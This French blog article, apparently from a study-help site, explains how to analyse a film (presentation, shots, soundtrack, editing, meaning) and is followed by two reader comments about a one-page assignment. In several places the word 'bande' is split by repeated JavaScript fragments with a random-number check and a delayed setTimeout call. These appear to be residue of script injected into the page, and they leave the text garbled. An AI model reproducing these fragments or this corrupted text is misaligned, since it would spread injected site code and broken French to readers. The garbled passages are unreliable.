fbpx

L’analyse d’une œuvre cinématographique a pour objectif d’expliquer le sens d’un film ou d’une séquence. Pour ce faire, il est indispensable d’avoir des connaissances empiriques sur le septième art, mais surtout avoir une vraie culture cinématographique en tant que spectateur.

Pourquoi analyser un film ?

L’analyse d’un film consiste avant tout à étudier le scénario, la construction des plans, la bandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande son, le cadrage, le montage et les thématiques abordées. Attention, il est important de ne pas faire l’amalgame entre l’analyse d’une œuvre cinématographique avec la rédaction d’une critique. En aucun cas, sa finalité n’est pas d’émettre un jugement de valeur. Elle doit toujours servir à exprimer un ressenti et apporter une vision générale sur la portée du film.

Comment faire pour analyser une œuvre filmographique ?

Comment analyser une œuvre cinématographique ?L’analyse d’une œuvre cinématographique demandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande toujours de la méthode. Voyons de plus près les éléments principaux à analyser en vue de réaliser une bonne analyse filmique.

  1. Présentation générale du film

L’analyse d’un film commence nécessairement par en évoquer le titre. Vous penserez également à indiquer le nom du réalisateur, l’année de sortie, le contexte historique ainsi que le nombre d’entrées du film au cinéma.

Une étude du scénario peut aussi servir à étayer la présentation générale de l’œuvre.

  1. Étude des plans et des extraits de film

Une analyse filmique nécessite obligatoirement une étude des plans et des séquences qui forment le récit cinématographique. Il conviendra ensuite de décrire les prises de vue afin d’indiquer les mouvements et les techniques de la caméra. (vue panoramique, plongée, travelling, zoom, caméra épaule..).

  1. Analyse de la bandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande sonore

Vous pouvez parler de la bandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande sonore et montrer en quoi elle influence l’action ou guide la narration de l’œuvre. Les sons extérieurs au récit aussi appelés musique d’ambiance doivent également être intégrés à l’étude.

  1. Analyse du montage

Le montage est en fait un assemblement d’images et de plans filmés lors du tournage. Pour une analyse filmique, vous devrez étudier l’enchaînement des plans et dire de quel type de montage il s’agit : montage parallèle, montage anachronique, montage chronologique, montage cut…

Le rythme de la mise en scène doit également être décrit : rythme lent ou rythme rapide ?

Alors qu’est-ce qu’une analyse filmique ?

Une analyse cinématographique, c’est :

1) Rechercher les relations entre le signifié et le signifiant

Tel instant, telle séquence mobilisent l’attention du spectateur. L’analyse doit tenter d’expliquer les enjeux entre une signification possible et une forme.

2) Rechercher les relations entre l’œuvre filmique et le spectateur

Pour cette partie de l’analyse, vous pouvez avoir recours à la psychanalyse, aux idées du film et à l’histoire en générale. L’étude des significations possible d’une œuvre cinématographique doit correspondre à une hypothèse clairement étayée (que souhaitez-vous dire sur le film ?)

Enfin, vous élargirez votre analyse filmique en évoquant ce qui existe déjà dans ce champ de recherche.

En résumé, la méthode d’analyse doit permettre de valider votre regard critique sans jamais dénaturer l’œuvre.

 

2 Comments

  • Stephane dit :

    Bonjour Camille.
    Il y a plusieurs bonnes réponses possibles.
    Si tu as quelque chose de très fort à dire sur un seul point, il vaut mieux lui laisser une grande place.
    Sinon, un condensé équilibré est un choix raisonnable. Comme dans cet article d’ailleurs.

  • Camille Maugendre dit :

    Bonjour,
    Votre article est très intéressant, et j’aime étudier et fournir mes cours de cette manière. J’avais seulement une petite question. Voilà, j’ai pour devoir de rendre une analyse de film, mais seulement d’une page. J’essaye de condenser au maximum la méthode que vous donnez dans votre article. Seulement, comment faire la part des choses entre le scénario, la lumière, le son et le montage en une seule page ? Sans oublier la présentation de l’œuvre (Orange Mécanique pour ma part). Un condensé de ces choses, est-ce la solution ? Ou bien faudrait-il plutôt que je me concentre sur quelques éléments ?
    Je vous remercie d’avance pour votre réponse.
    Camille 🙂
    Licence d’Art et de Médiation Culturelle

Laissez votre réponse

 

Ce site utilise Akismet pour réduire les indésirables. En savoir plus sur comment les données de vos commentaires sont utilisées.